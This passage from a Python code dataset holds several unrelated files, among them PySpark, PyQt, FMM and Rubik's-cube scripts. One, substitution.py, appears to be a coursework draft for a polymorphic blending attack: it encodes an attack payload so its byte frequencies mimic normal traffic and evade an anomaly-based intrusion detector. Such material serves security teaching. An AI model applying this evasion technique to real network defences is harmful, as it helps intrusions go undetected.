0\r\n","sub_path":"Self-Attention-GAN-temp/SAGAN.py","file_name":"SAGAN.py","file_ext":"py","file_size_in_byte":17019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"434985155","text":"def permutation():\r\n count = 0\r\n words = str(input(\"enter the word \\n\"))\r\n print(len(words))\r\n b = [words[i] for i in range(0,len(words),1)]\r\n q = len(b)\r\n vowels = ['a','e','i','o','u']\r\n for i in range(len(b)):\r\n for j in range(len(vowels)):\r\n if (b[i] == vowels[j]):\r\n print(\"found\")\r\n count = count+1\r\n print(\"total no of common words \",count)\r\n sp = q-count\r\n t_sp = sp+1\r\n sp_ct = t_sp - count\r\n print(\"total space\",t_sp)\r\n \r\n else:\r\n print(\"aborted...............\")\r\n \r\n if t_sp ==0:\r\n return \"no space\"\r\n \r\n else:\r\n fact_sp = 1\r\n for k in range(1,t_sp + 1):\r\n if t_sp == 
0:\r\n print(\"only one way\")\r\n else:\r\n fact_sp = fact_sp*k\r\n print(fact_sp)\r\n \r\n \r\n \r\n fact_sp_ct = 1\r\n \r\n for l in range(1,sp_ct+1):\r\n \r\n sp_ct = t_sp - count\r\n if sp_ct<0:\r\n print(\"not enough space\")\r\n elif sp_ct == 0:\r\n print(\"word cannot be form\")\r\n else:\r\n fact_sp_ct = fact_sp_ct * l \r\n print(\"sp - ct.........=\",fact_sp_ct)\r\n \r\n \r\n rem_wd= len(words)- count\r\n fact_rem_wd = 1\r\n print(rem_wd)\r\n for m in range(1,rem_wd+1):\r\n fact_rem_wd = fact_rem_wd*m\r\n print(\"no... of remaining word fectorial is.....\\n \",fact_rem_wd)\r\n \r\n \r\n tot_way= (fact_sp/fact_sp_ct)*fact_rem_wd\r\n return tot_way\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"permutation_of_words.py","file_name":"permutation_of_words.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163761930","text":"#Ne pas oublier de changer le module à importer\nmodule=\"Les_conditions/Calcul_volume\"\n\nimport sys\nimport io\nfrom ma_bao import *\ntester(\"from Calcul_volume import volume \",globals())\n\ndef f_sol(L,l,h):\n return L*l*h\n \n#liste des couples input/output\ninput_output=[(0,0,0),(1,1,1),(1,9,5),(9,1,5),(0.5,1.5,2.5)]\n\n\n#message d'aide si besoin\nhelp=\"N'oublie pas d'utiliser return pour afficher le resultat\"\n\n#Afficher la correction\ndef afficher_correction():\n try:\n with open(module+\"_Correction.py\", \"r\") as correction :\n ligne=\"Voici un ou des exemples de corrections possibles\"\n send_msg(\"Exemple(s) de correction\", ligne)\n ligne=\"-------------------------------------------------\"\n send_msg(\"Exemple(s) de correction\", ligne)\n lignes=correction.read().split(\"\\n\")\n for ligne in lignes:\n send_msg(\"Exemple(s) de correction\", ligne)\n except:\n pass\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n send_msg(\"Tests validés\",\"Bravo !\")\n afficher_correction()\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n \n\ndef test():\n try:\n for inp in input_output:\n outp=f_sol(*inp)\n count1=volume(*inp)\n assert str(count1) == str(outp), \"En testant les valeurs {} le résultat obtenu est {} au lieu de {}\".format(str(inp),str(count1),str(outp))\n send_msg(\"Tests validés\",\"En testant les valeurs {} le résultat obtenu est bien {}\".format(str(inp),str(count1)))\n success()\n except AssertionError as e:\n fail()\n send_msg(\"Oops! 
\", e)\n if help:\n send_msg(\"Aide 💡\", help)\n\n\nif __name__ == \"__main__\": test()\n","sub_path":"python-project/Les_fonctions/Calcul_volume_Test.py","file_name":"Calcul_volume_Test.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"25507941","text":"'''jupyterで\b実行している'''\n\n#%%\n# DataFrameの作成\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName('Python Spark SQL basic example').config('spark.some.config.option', 'some-value').getOrCreate()\ndf = spark.read.json('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.json')\ndf.show()\n#%%\n# DataFrameの操作\ndf.printSchema()\ndf.select('name').show()\ndf.select(df['name'], df['age'] + 1).show()\ndf.filter(df['age'] > 21).show()\ndf.groupBy('age').count().show()\n\n#%%\n# SQL\ndf.createOrReplaceTempView('people')\n\nsql_df = spark.sql('select * from people')\nsql_df.show()\n\n#%%\n# RDDからDataFrameへ変換\n# 1.Reflectionを用いてスキーマの推論\nfrom pyspark.sql import Row\n\nsc = spark.sparkContext\n\nlines = sc.textFile('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.txt')\nparts = lines.map(lambda l: l.split(','))\npeople = parts.map(lambda p: Row(name=p[0], age=int(p[1])))\n\nschema_people = spark.createDataFrame(people)\nschema_people.createOrReplaceTempView('people')\n\nteenagers = spark.sql('select name from people where age >= 13 and age <= 19')\nteennames = teenagers.rdd.map(lambda p: 'Name: ' + p.name).collect()\nfor name in teennames:\n print(name)\n\n#%%\n# 2.スキーマの指定\nfrom pyspark.sql.types import *\n\nsc = spark.sparkContext\n\nlines = sc.textFile('../../spark-2.4.0-bin-hadoop2.7/examples/src/main/resources/people.txt')\nparts = lines.map(lambda l: l.split(','))\npeople = parts.map(lambda p: (p[0], p[1].strip()))\n\nschema_string = 'name age'\nfields = [StructField(field_name, StringType(), True) for field_name in schema_string.split()]\nschema = StructType(fields)\n\nschema_people = spark.createDataFrame(people, schema).show()\n","sub_path":"spark_sql.py","file_name":"spark_sql.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269564321","text":"from numpy import int32\r\nfrom os import path\r\nfrom utils.time_utils import CurrentDateTime\r\nfrom initializing import DataFrameStrategy, ComandLineProcessor_Excel, notifier\r\nimport pandas as pd\r\n\r\n#Change the location for the following folders.\r\noutput_folder = r\"####\"\r\ninput_folder = r\"####\"\r\nhistory_folder = r\"######\"\r\n\r\ndef main():\r\n\tcurrent_dt = CurrentDateTime()\r\n\tcomand_line_processor = ComandLineProcessor_Excel(input_folder, history_folder)\r\n\tdf_strategy = DataFrameStrategy(pd, comand_line_processor)\r\n\traw_df = df_strategy.intitialize_data_frame()\r\n\tdf = clean_data_frame(raw_df)\r\n\tdf_columns_added = add_required_columns(df, current_dt)\r\n\tdf_formatted = apply_format(df_columns_added)\r\n\toutput_to_csv(df_formatted, current_dt)\r\n\tdf_strategy.finalize()\r\n\r\n\r\ndef clean_data_frame(input_df):\r\n\traw_df = input_df.copy()\r\n\traw_df = raw_df.convert_dtypes()\r\n\traw_df[\"Buffer\"] = raw_df[\"Buffer\"].map(lambda k: 0.0 if k ==\"буфер 0\" else k)\r\n\traw_df = raw_df[[\"SKU\", \"Buffer\"]]\r\n\tdf = raw_df.dropna()\t\r\n\tdf.reset_index(drop=True, inplace=True)\r\n\treturn df\r\n\t\r\n\r\ndef add_required_columns(input_df, current_dt: CurrentDateTime):\r\n\tdf = 
input_df.copy()\r\n\tdf[\"0-Name\"] = \"Buf_Manual_{0} {1} {2} {3}\".format(current_dt.month_name(),\r\n\t\t\t\t\t\t\t\tcurrent_dt.day(), \r\n\t\t\t\t\t\t\t\tcurrent_dt.year(), \r\n\t\t\t\t\t\t\t\tcurrent_dt.time()\r\n\t)\r\n\tdf[\"1-Location\"] = \"006\"\r\n\tdf[\"3-Null\"] = \"null\"\r\n\tdf[\"4\"] = \"buffer\"\r\n\tdf[\"5-yr1\"] = current_dt.year()\r\n\tdf[\"6-month1\"] = current_dt.month()\r\n\tdf[\"7-day1\"] = current_dt.day()\r\n\tdf[\"8-yr2\"] = current_dt.year()\r\n\tdf[\"9-month2\"] = current_dt.month()\r\n\tdf[\"10-day2\"] = current_dt.day()\r\n\tdf[\"11\"] = 1\r\n\tdf[\"13-Value\"] = \"FixedValue\"\r\n\tdf[\"14\"] = 1\r\n\tdf[\"15\"] = \"Approved\"\r\n\tvalues = [\" \" for i in range(1, 11)] + [current_dt.year(),\r\n\t\t\t\t\tcurrent_dt.month(), current_dt.day()]\r\n\tfor i in range(len(values)):\r\n\t\tdf[f\"{16 + i}\"] = values[i]\r\n\treturn df\r\n\r\n@notifier(\"Dataframe finished the formatting and processing phases. Outputting to csv.\")\r\ndef apply_format(input_df):\r\n\tdf = input_df.copy()\r\n\tdf = df[[\"0-Name\", \"1-Location\", \"SKU\", \"3-Null\", \"4\", '5-yr1',\r\n\t\t'6-month1', '7-day1', '8-yr2', '9-month2', '10-day2', '11', \"Buffer\", '13-Value', '14', '15',\r\n\t\t'16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28']]\r\n\tdf = df.astype({\"Buffer\": int32})\r\n\treturn df\r\n\r\n@notifier(\"Success, the csv is created.\")\r\ndef output_to_csv(formated_df, current_dt: CurrentDateTime):\r\n\tdate_format, time_format = current_dt.output_format_dd_tt()\r\n\toutput_name = \"SEASONALITY_Calculate_Buffers_Manual{0}_{1}.csv\".format(date_format, time_format)\r\n\toutput_name = path.join(output_folder, output_name) \r\n\tformated_df.to_csv(output_name, sep=\"|\", index=False, header=False)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","sub_path":"formatter/formatter_app.py","file_name":"formatter_app.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319403180","text":"#!/usr/bin/env python2\nimport struct\nimport math\nimport dpkt\nimport socket\nimport numpy as np\nfrom collections import Counter\nfrom frequency import *\n\ndef substitute(attack_payload, substitution_table):\n # Using the substitution table you generated to encrypt attack payload\n # Note that you also need to generate a xor_table which will be used to decrypt the attack_payload\n # i.e. (encrypted attack payload) XOR (xor_table) = (original attack payload)\n b_attack_payload = bytearray(attack_payload)\n result = []\n xor_table = []\n # Based on your implementattion of substitution table, please prepare result and xor_table as output\n \n # For each byte in attack payload,\n for byte_in_att in b_attack_payload:\n\n print(byte_in_att)\n # Get the list for the character from the substition table\n char_temp = chr(byte_in_att)\n char_list = substitution_table[char_temp]\n \n # If the list is only one character, \n if len(char_list) == 1:\n # Substitute that single character in\n char_chosen = char_list[0][0]\n # Otherwise, choose one character at random from the list\n else:\n # By first going through each choice in list\n chars_to_select = []\n chars_freqs = []\n for char_choice in char_list:\n # And adding it to an array \n chars_to_select.append(char_choice[0])\n # and add its frequency to a list\n chars_freqs.append(char_choice[1])\n\n # Spread the frequencies between 1 (e.g. 
0.1, 0.3 and 0.4 would go\n # 0.125, 0.375 and 0.5)\n # First add up all of the frequecies\n total = 0\n for next in chars_freqs:\n total += next\n # then multiply each item by 1/total\n for cnt in range(0,len(chars_freqs)):\n chars_freqs[cnt] = chars_freqs[cnt] * (1/total)\n\n # Then choose one letter at random, based on the frequency\n char_chosen = np.random.choice(chars_to_select, p=chars_freqs)\n \n # add it to the result.\n result.append(char_chosen)\n\n # Create a XOR table\n\n table_cnt = 0\n \n # For each character in the substitution table i.e. Find a list and then\n # loop through the list...\n for att_repl_char, sub_list in substitution_table.iteritems():\n for sub_char_tup in sub_list: \n\n # Loop, increasing a counter, until result is found - brute force!\n found = False\n xor_cnt = 0\n while found == False:\n # If correct result found, finish the loop\n # i.e. if the current counter XOR next substitution character == the\n # attack character...\n print(\"sub_char_tup[0] = \" + str(ord(sub_char_tup[0])))\n print(\"att_repl_char = \" + str(ord(att_repl_char)))\n print(\"result = \" + str(xor_cnt ^ ord(sub_char_tup[0])))\n res = xor_cnt ^ ord(sub_char_tup[0])\n #xor_cnt += 1\n if res == ord(att_repl_char):\n found = True\n # else continue the loop\n else:\n xor_cnt += 1\n\n # Add result to XOR table\n xor_table.append(xor_cnt)\n table_cnt += 1\n print(\"XOR Table\")\n print(xor_table)\n input(\"...\")\n\n return (xor_table, result)\n\ndef getSubstitutionTable(artificial_payload, attack_payload):\n # You will need to generate a substitution table which can be used to encrypt the attack body by replacing the most frequent byte in attack body by the most frequent byte in artificial profile one by one\n\n # Note that the frequency for each byte is provided below in dictionay format. Please check frequency.py for more details\n artificial_frequency = frequency(artificial_payload)\n attack_frequency = frequency(attack_payload)\n\n sorted_artificial_frequency = sorting(artificial_frequency)\n sorted_attack_frequency = sorting(attack_frequency)\n\n # Your code here ...\n \n # Create an empty dictionary for the substitute table whose keys are \n # characters and who values are list of tuples. The list of tuples \n # are characters with floats.\n substitution_table = {}\n \n # Copy each character into the substitute table keys from the sorted \n # attack frequency data structure.\n for char_tup in sorted_attack_frequency:\n substitution_table[char_tup[0]] = []\n\n # For the first m characters, and first n, (Using m and n as a tuples here)\n for m, n in zip(sorted_attack_frequency, sorted_artificial_frequency):\n # Map attack characters to normal characters.\n substitution_table[m[0]] = [n] \n\n print(\"-----------------------\")\n #substitution_table['!'].append(('b',0))\n print(substitution_table) \n # Create counter for size of m to go to size of n\n m_plus_n_cnt = len(substitution_table)\n\n # Create a temporary table of all of the character left from the \n # artificial table\n chars_left =[]\n\n for cnt in range(m_plus_n_cnt, len(sorted_artificial_frequency)):\n chars_left.append(sorted_artificial_frequency[cnt])\n \n \n # For each of the m+nth characters in the artificial table:\n for art_char in chars_left:\n # Hold the largest of the substitute table subsub ratios\n highest_ratio = 0 \n # ... 
and it's character tuple\n highest_ratio_char = ()\n \n # For each of the characters in the substition table\n for att_char in sorted_attack_frequency:\n sub_sub_total = 0\n sub_ratio = 0\n\n # For each of the tuples in the substituion table character list\n for subst_char in substitution_table[att_char[0]]:\n sub_sub_total += subst_char[1]\n \n # Now create the ratio of current subst table char and compare it\n # with the highest. If higher, set as new\n sub_ratio = att_char[1] / sub_sub_total\n print(\"sub_ratio = \" + str(sub_ratio))\n print(\"highest Ratio = \" + str(highest_ratio))\n\n if sub_ratio > highest_ratio: \n highest_ratio = sub_ratio\n highest_ratio_char = att_char\n print(\"rat = \" + str(sub_ratio))\n \n substitution_table[highest_ratio_char[0]].append(art_char)\n print(\"substitution_table = \")\n print(substitution_table)\n \n # You may implement substitution table in your way. Just make sure it can be used in substitute(attack_payload, subsitution_table)\n return substitution_table\n\ndef getAttackBodyPayload(path):\n f = open(path)\n pcap = dpkt.pcap.Reader(f)\n for ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n if socket.inet_ntoa(ip.dst) == \"192.150.11.111\": # TASK: Add in the destination address for your attack payload in quotes\n tcp = ip.data\n if tcp.data == \"\":\n continue\n return tcp.data.rstrip()\n\ndef getArtificialPayload(path):\n f = open(path)\n pcap = dpkt.pcap.Reader(f)\n for ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n tcp = ip.data\n if tcp.sport == 80 and len(tcp.data) > 0:\n return tcp.data\n","sub_path":"substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9679519","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPainter, QBrush, QPixmap, QLinearGradient, QRadialGradient, QConicalGradient\nfrom PyQt5.QtWidgets import QApplication, QWidget\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(600, 600)\n\n self.brush1 = QBrush(Qt.SolidPattern) # 1\n\n self.brush2 = QBrush(Qt.Dense6Pattern) # 2\n self.brush2.setColor(Qt.red)\n\n gradient1 = QLinearGradient(200, 200, 300, 300) # 3\n gradient1.setColorAt(0.2, Qt.red)\n gradient1.setColorAt(0.8, Qt.green)\n gradient1.setColorAt(1, Qt.blue)\n self.brush3 = QBrush(gradient1)\n\n gradient2 = QRadialGradient(350, 350, 50, 350, 350) # 4\n gradient2.setColorAt(0, Qt.red)\n gradient2.setColorAt(1, Qt.blue)\n self.brush4 = QBrush(gradient2)\n\n gradient3 = QConicalGradient(450, 450, 90) # 5\n gradient3.setColorAt(0, Qt.red)\n gradient3.setColorAt(1, Qt.blue)\n self.brush5 = QBrush(gradient3)\n\n self.brush6 = QBrush(Qt.TexturePattern) # 6\n self.brush6.setTexture(QPixmap('images/smile.png'))\n\n def paintEvent(self, QPaintEvent):\n painter = QPainter(self)\n painter.setBrush(self.brush1) # 7\n painter.drawRect(0, 0, 100, 100)\n\n painter.setBrush(self.brush2)\n painter.drawRect(100, 100, 100, 100)\n\n painter.setBrush(self.brush3)\n painter.drawRect(200, 200, 100, 100)\n\n painter.setBrush(self.brush4)\n painter.drawRect(300, 300, 100, 100)\n\n painter.setBrush(self.brush5)\n painter.drawRect(400, 400, 100, 100)\n\n painter.setBrush(self.brush6)\n painter.drawRect(500, 500, 100, 100)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n 
sys.exit(app.exec_())","sub_path":"assembly/0427/explore_qt/31/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"376100281","text":"import pykifmm2d\nimport pykifmm2d.class_fmm as fmm\nimport numpy as np\nimport numba\nimport time\nimport os\n\n\"\"\"\nDemonstration of the FMM for the Helmholtz Kernel\n\nIf N <= 50000, will do a direct sum and compare to this\nOtherwise, will try to call FMMLIB2D through pyfmmlib2d\nTo compare to\nIf this fails, no comparison for correctness!\n\nOn my macbook pro N=50,000 takes the direct method ~7s, the FMM <1s\n(with N_equiv=64, N_cutoff=500)\nAnd gives error <5e-14\n\"\"\"\n\ncpu_num = int(os.cpu_count()/2)\n\nrandom2 = pykifmm2d.utils.random2\nPrepare_Functions_OTF = fmm.prepare_numba_functions_on_the_fly\nPrepare_K_Functions = fmm.Get_Kernel_Functions\n\n# Helmholtz Kernel\nfrom fast_interp import chebyshev_function_generator\nCFG = chebyshev_function_generator.ChebyshevFunctionGenerator\n\nfrom scipy.special import hankel1\n_h0 = CFG(lambda x: hankel1(0, x), 1e-30, 2000, tol=1e-14, n=32, verbose=False)\nh0 = _h0.get_base_function()\n\nhelmholtz_k = 2.0\n\n@numba.njit(fastmath=True)\ndef Eval(sx, sy, tx, ty):\n return h0(helmholtz_k*np.sqrt((tx-sx)**2 + (ty-sy)**2))*0.25j\n\n# associated kernel evaluation functions\nkernel_functions = Prepare_K_Functions(Eval)\n(KF, KA, KAS) = kernel_functions\n# jit compile internal numba functions\nnumba_functions_otf = Prepare_Functions_OTF (Eval)\n# numba_functions_plan = Prepare_Functions_PLAN(Laplace_Eval)\n\nN_source = 1000*10\nN_target = 1000*1000*10\ntest = 'circle' # clustered or circle or uniform\n\n# construct some data to run FMM on\nif test == 'uniform':\n px = np.random.rand(N_source)\n py = np.random.rand(N_source)\n rx = np.random.rand(N_target)\n ry = np.random.rand(N_target)\nelif test == 'clustered':\n N_clusters = 10\n N_per_cluster = int((N_source / N_clusters))\n N_random = N_source - N_clusters*N_per_cluster\n center_clusters_x, center_clusters_y = random2(N_clusters, -99, 99)\n px, py = random2(N_source, -1, 1)\n px[:N_random] *= 100\n py[:N_random] *= 100\n px[N_random:] += np.repeat(center_clusters_x, N_per_cluster)\n py[N_random:] += np.repeat(center_clusters_y, N_per_cluster)\n px /= 100\n py /= 100\n rx = np.random.rand(N_target)\n ry = np.random.rand(N_target)\nelif test == 'circle':\n rand_theta = np.random.rand(N_source)*2*np.pi\n px = np.cos(rand_theta)\n py = np.sin(rand_theta)\n rx = np.random.rand(N_target)*2 - 1\n ry = np.random.rand(N_target)*2 - 1\nelse:\n raise Exception('Test is not defined')\n\n# maximum number of points in each leaf of tree for FMM\nN_cutoff = 50\n# number of points used in Check/Equivalent Surfaces\nN_equiv = 48\n\n# get random density\ntau = (np.random.rand(N_source))\n\nprint('\\nHelmholtz FMM with', N_source, 'source pts and', N_target, 'target pts.')\n\n# get reference solution\nreference = True\nif reference:\n if N_source*N_target <= 10000**2:\n # by Direct Sum\n st = time.time()\n self_reference_eval = np.zeros(N_source, dtype=complex)\n KAS(px, py, tau, out=self_reference_eval)\n time_self_eval = (time.time() - st)*1000\n st = time.time()\n target_reference_eval = np.zeros(N_target, dtype=complex)\n KA(px, py, rx, ry, tau, out=target_reference_eval)\n time_target_eval = (time.time() - st)*1000\n print('\\nDirect self evaluation took: {:0.1f}'.format(time_self_eval))\n print('Direct target evaluation took: 
{:0.1f}'.format(time_target_eval))\n else:\n # by FMMLIB2D, if available\n try:\n import pyfmmlib2d\n source = np.row_stack([px, py])\n target = np.row_stack([rx, ry])\n dumb_targ = np.row_stack([np.array([0.6, 0.6]), np.array([0.5, 0.5])])\n st = time.time()\n out = pyfmmlib2d.HFMM(source, dumb_targ, charge=tau, compute_target_potential=True, helmholtz_parameter=helmholtz_k)\n tform = time.time() - st\n print('FMMLIB generation took: {:0.1f}'.format(tform*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_source/tform/cpu_num/1000), '\\033[0m ')\n st = time.time()\n out = pyfmmlib2d.HFMM(source, charge=tau, compute_source_potential=True, helmholtz_parameter=helmholtz_k)\n self_reference_eval = out['source']['u']\n tt = time.time() - st - tform\n print('FMMLIB self only eval took: {:0.1f}'.format(tt*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\n st = time.time()\n out = pyfmmlib2d.HFMM(source, target, charge=tau, compute_target_potential=True, helmholtz_parameter=helmholtz_k)\n target_reference_eval = out['target']['u']\n tt = time.time() - st - tform\n print('FMMLIB target only eval took: {:0.1f}'.format(tt*1000))\n print('...Points/Second/Core (thousands) \\033[1m', int(N_target/tt/cpu_num/1000), '\\033[0m ')\n except:\n print('')\n reference = False\n\n# do my FMM (once first, to compile functions...)\nFMM = fmm.FMM(px, py, kernel_functions, numba_functions_otf, N_equiv, N_cutoff, True)\nFMM.precompute()\nFMM.build_expansions(tau)\n_ = FMM.evaluate_to_points(px, py, True)\n\nst = time.time()\nprint('')\nFMM = fmm.FMM(px, py, kernel_functions, numba_functions_otf, N_equiv, N_cutoff, True)\nFMM.precompute()\nprint('pyfmmlib2d precompute took: {:0.1f}'.format((time.time()-st)*1000))\nst = time.time()\nFMM.build_expansions(tau)\ntt = (time.time()-st)\nprint('pyfmmlib2d generation took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\nst = time.time()\nself_fmm_eval = FMM.evaluate_to_points(px, py, True)\ntt = (time.time()-st)\nprint('pyfmmlib2d source eval took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_source/tt/cpu_num/1000), '\\033[0m ')\n\nst = time.time()\ntarget_fmm_eval = FMM.evaluate_to_points(rx, ry)\ntt = (time.time()-st)\nprint('pyfmmlib2d target eval took: {:0.1f}'.format(tt*1000))\nprint('...Points/Second/Core (thousands) \\033[1m', int(N_target/tt/cpu_num/1000), '\\033[0m ')\n\nif reference:\n scale = np.abs(self_reference_eval).max()\n self_err = np.abs(self_fmm_eval - self_reference_eval)/scale\n target_err = np.abs(target_fmm_eval - target_reference_eval)/scale\n print('\\nMaximum difference, self: {:0.2e}'.format(self_err.max()))\n print('Maximum difference, target: {:0.2e}'.format(target_err.max()))\n\nif False:\n # plan fmm\n st = time.time()\n fmm_plan = pykifmm2d.fmm.fmm_planner(px, py, N_equiv, N_cutoff, kernel_functions, numba_functions_plan, verbose=True)\n planning_time = (time.time()-st)*1000\n # execute fmm\n st = time.time()\n fmm_eval = pykifmm2d.fmm.planned_fmm(fmm_plan, tau)\n time_fmm_eval = (time.time() - st)*1000\n err = np.abs(fmm_eval - reference_eval)\n\n print('\\nFMM planning took: {:0.1f}'.format(planning_time))\n print('FMM evaluation took: {:0.1f}'.format(time_fmm_eval))\n print('Maximum difference: 
{:0.2e}'.format(err.max()))\n\n","sub_path":"examples/hankel.py","file_name":"hankel.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"225964809","text":"#recursive function that returns the reverse of the string with the symbol '|' on the right side of the letter (except the last one)\ndef reverse_string(string):\n string = list(string)\n s = len(string) # length of the string\n s0 = string[0] # first letter of the string\n\n if s == 1: # base code\n return string # if the string has only 1 letter, return the string itself\n\n else: # else\n # the function calls itself and adds in the end the first letter of the string\n return reverse_string(string[1:]) + ['|'] + [s0]\n\nprint(reverse_string('GMIT'))\n","sub_path":"reverse_string.py","file_name":"reverse_string.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"379069654","text":"import re\n\nmove_offsets = (\"\", \"2\", \"'\")\nmove_dirs = \"uUlLfFrRbBdDMES\"\nmove_rots = \"xyz\"\nmove_others = \"34w2'\"\nmove_valid_chars = move_dirs + move_rots + move_others\n\ndef is_valid_move(move):\n # Check all chars in move string are valid possible moves\n if len(move) == 0:\n return False\n if not all(ch in move_valid_chars for ch in move):\n return False\n\n # Wide turn with more than 2 layers\n if move[0].isdigit():\n # 2 or less layer turns do not require a number \n if move[0] in \"012\":\n return False\n # If a number is present, must use \"w\" to signal a wide turn\n if len(move) < 3 or move[2] != 'w':\n return False\n move = move[1:]\n\n # Check that the directional indicator is valid\n if len(move) == 0 or move[0] not in move_dirs:\n return False\n move_dir = move[0]\n move = move[1:]\n\n # Remaining suffixes are \"'\", \"2\" possibly with w before\n if move_dir not in \"ULFRBD\":\n if len(move) != 0 and move[0] not in move_offsets:\n return False\n elif len(move) != 0:\n move = move[1:]\n else:\n if len(move) != 0 and move[0] == 'w':\n move = move[1:]\n\n # Remaining part should be a move offset\n return move in move_offsets\n\ndef is_commutator(comm):\n return ',' in comm or '/' in comm or '*' in comm or ':' in comm\n\ndef get_move_split_idx(move):\n idx = 0\n while idx < len(move) and move[idx] in move_valid_chars[:-2]:\n idx += 1\n return idx\n\ndef inverse_move(move):\n if len(move) > 2:\n move = move[:2]\n idx = get_move_split_idx(move)\n base = move[:idx]\n offset = move[idx:]\n return base + move_offsets[2-move_offsets.index(offset)]\n\ndef cancel_moves(move1, move2):\n idx1 = get_move_split_idx(move1)\n idx2 = get_move_split_idx(move2)\n\n base1 = move1[:idx1]\n base2 = move2[:idx2]\n if base1 != base2:\n return (False, move2)\n\n offset1 = move1[idx1:]\n offset2 = move2[idx2:]\n\n net_offset = (move_offsets.index(offset1) + move_offsets.index(offset2) + 2) % 4\n if net_offset == 0:\n return (True, None)\n else:\n return (True, base1 + move_offsets[net_offset-1])\n\ndef cancel_str(move_list):\n out_list = [move_list[0]]\n\n for i in range(1, len(move_list)):\n pop_prev, add_next = cancel_moves(move_list[i-1], move_list[i])\n if pop_prev:\n if len(out_list) > 0:\n out_list.pop()\n if add_next is not None:\n out_list.append(add_next)\n\n return out_list\n\ndef inverse_moves(move_str):\n move_str = move_str.split()\n return ' '.join(reversed([inverse_move(move) for move in move_str]))\n\ndef comm_to_moves(comm):\n if not 
is_commutator(comm):\n return comm\n\n # replace apostrophe\n comm = comm.replace(\"’\", \"'\")\n\n comm = comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n has_mul = False\n if '*' in comm:\n comm = comm[:comm.index('*')]\n has_mul = True\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return \"\"\n\n move_str = \"\"\n if ',' in comm:\n move_str = comm_list[-2] + ' ' + comm_list[-1] + ' ' + inverse_moves(comm_list[-2]) + ' ' + inverse_moves(comm_list[-1])\n elif '/' in comm:\n move_str = comm_list[-2] + ' ' + comm_list[-1] + ' ' + comm_list[-2][0] + '2 ' + inverse_moves(comm_list[-1]) + ' ' + comm_list[-2]\n elif has_mul: \n move_str = comm_list[-1] + ' ' + comm_list[-1]\n else: \n move_str = comm_list[-1]\n if has_setup:\n move_str = comm_list[0] + ' ' + move_str + ' ' + inverse_moves(comm_list[0])\n\n # change 2' to 2 \n move_str = move_str.replace(\"2'\", \"2\")\n move_list = move_str.split()\n\n out_list = cancel_str(move_list)\n for _ in range(len(out_list)):\n out_list = cancel_str(out_list)\n\n return ' '.join(out_list)\n\ndef inverse_comm(comm):\n if not is_commutator(comm):\n return comm\n\n add_sq_brackets = '[' in comm and ']' in comm\n # left and right brackets\n lbr = '[' if add_sq_brackets else ''\n rbr = ']' if add_sq_brackets else ''\n\n # replace apostrophe\n comm = comm.replace(\"’\", \"'\")\n\n comm = comm.replace('[', '').replace(']', '')\n comm = comm.replace('(', '').replace(')', '')\n comm = comm.replace('{', '').replace('}', '').strip()\n has_mul = False\n if '*' in comm:\n comm = comm[:comm.index('*')]\n has_mul = True\n has_setup = ':' in comm\n comm_list = [x.strip() for x in re.split(':|,|/', comm)]\n if len(comm_list) == 0:\n return \"\"\n\n move_str = \"\"\n if ',' in comm:\n move_str = lbr + comm_list[-1] + ', ' + comm_list[-2] + rbr\n elif '/' in comm:\n move_str = '{' + f\"{inverse_moves(comm_list[-2])}/{comm_list[-1]}\" + '}'\n elif has_mul: \n move_str = (f\"({inverse_moves(comm_list[-1])}) * 2\")\n else: \n move_str = comm_list[-1]\n if has_setup:\n move_str = lbr + comm_list[0] + ': ' + move_str + rbr\n\n return move_str\n\ndef get_comm_parts(comm):\n if not is_commutator(comm):\n return comm\n\n parts = {\n 'setup': \"\",\n 'insertion': \"\",\n 'interchange': \"\",\n }\n\n comm = comm.replace(\"’\", \"'\")\n comm = 